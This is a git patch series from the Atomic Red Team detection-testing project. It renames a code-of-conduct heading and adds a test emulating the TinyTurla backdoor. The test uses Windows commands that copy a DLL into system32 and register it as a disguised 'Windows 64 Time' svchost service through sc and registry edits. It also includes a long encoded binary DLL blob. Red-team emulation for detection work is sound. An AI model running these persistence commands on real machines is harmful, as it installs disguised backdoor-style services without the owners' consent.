From 98c5936be2243fcb4b29f3295e81b136f3f607eb Mon Sep 17 00:00:00 2001 From: "Marrelle Bailey (She/Her)" <66318176+MarrelleBailey@users.noreply.github.com> Date: Tue, 1 Feb 2022 10:49:25 -0600 Subject: [PATCH 1/4] Taking out the work covenant (#1754) deleting a word from the title --- CODE_OF_CONDUCT.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md index 4c7333d7..7575b89f 100644 --- a/CODE_OF_CONDUCT.md +++ b/CODE_OF_CONDUCT.md @@ -1,4 +1,4 @@ -# Contributor Covenant Code of Conduct +# Contributor Code of Conduct Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation. From f9c2a9b69e488cfb3a796fcaa6ec7da25c8b3177 Mon Sep 17 00:00:00 2001 From: nsher07 <90919224+nsher07@users.noreply.github.com> Date: Wed, 2 Feb 2022 21:57:20 +0530 Subject: [PATCH 2/4] New Atomic T1543.003 Tiny Turla Backdoor Service w64time (#1756) * Update T1543.003.yaml Atomic - T1045.003 - TinyTurla backdoor service w64time It's running Dll as service to emulate the tine turla backdoor * Create W64Time.cpp * The Dll file for T145.003 Tiny Turla * Fixed YAML syntax * add blog link to description Co-authored-by: Carrie Roberts --- atomics/T1543.003/T1543.003.yaml | 29 +++++++++ atomics/T1543.003/bin/W64Time.dll | Bin 0 -> 124928 bytes atomics/T1543.003/src/W64Time.cpp | 98 ++++++++++++++++++++++++++++++ 3 files changed, 127 insertions(+) create mode 100644 atomics/T1543.003/bin/W64Time.dll create mode 100644 atomics/T1543.003/src/W64Time.cpp diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml index b126530e..338b07ac 100644 --- a/atomics/T1543.003/T1543.003.yaml +++ b/atomics/T1543.003/T1543.003.yaml @@ -91,3 +91,32 @@ atomic_tests: Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} +- name: TinyTurla backdoor service w64time + description: | + It's running Dll as service to emulate the tine turla backdoor + + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + supported_platforms: + - windows + input_arguments: + dllfilename: + description: It specifies Dll file to run as service + type: string + default: $PathToAtomicsFolder\T1543.003\bin\w64time.dll + executor: + command: |- + copy #{dllfilename} %systemroot%\system32\ + sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto + sc config W64Time DisplayName= "Windows 64 Time" + sc description W64Time "Maintain date and time synch on all clients and services in the network" + reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f + reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f + sc start W64Time + cleanup_command: |- + sc stop W64Time + sc.exe delete W64Time + del %systemroot%\system32\w64time.dll + reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f + reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f + name: command_prompt + elevation_required: true diff --git a/atomics/T1543.003/bin/W64Time.dll b/atomics/T1543.003/bin/W64Time.dll new file mode 100644 index 0000000000000000000000000000000000000000..320e3e4b282ab4ff81212b61ee1eb5e63570eef5 GIT binary patch literal 124928 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 